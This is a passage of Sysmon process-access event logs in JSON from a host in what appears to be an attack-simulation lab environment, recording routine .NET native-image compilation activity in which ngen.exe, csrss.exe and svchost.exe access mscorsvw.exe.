C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:26.818","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-228A-5F25-0000-0010401D0F00}","TargetProcessId":"2908","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8304,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:26.881\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-228B-5F25-0000-001074210F00}\r\nTargetProcessId: 4520\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:26.881","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-228B-5F25-0000-001074210F00}","TargetProcessId":"4520","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8305,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:26.881\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-228B-5F25-0000-001074210F00}\r\nTargetProcessId: 4520\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:26.881","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-228B-5F25-0000-001074210F00}","TargetProcessId":"4520","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:07:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8306,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:26.881\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-228B-5F25-0000-001074210F00}\r\nTargetProcessId: 4520\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:26.881","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-228B-5F25-0000-001074210F00}","TargetProcessId":"4520","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8307,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:26.928\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-22BE-5F25-0000-001039291100}\r\nTargetProcessId: 1348\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:26.928","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-22BE-5F25-0000-001039291100}","TargetProcessId":"1348","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8308,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:26.928\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-22BE-5F25-0000-001039291100}\r\nTargetProcessId: 1348\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:26.928","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-22BE-5F25-0000-001039291100}","TargetProcessId":"1348","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:07:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8309,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:26.928\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-22BE-5F25-0000-001039291100}\r\nTargetProcessId: 1348\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:26.928","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-22BE-5F25-0000-001039291100}","TargetProcessId":"1348","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8310,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:26.968\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-22AB-5F25-0000-0010755A1000}\r\nTargetProcessId: 4552\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:26.968","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-22AB-5F25-0000-0010755A1000}","TargetProcessId":"4552","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.d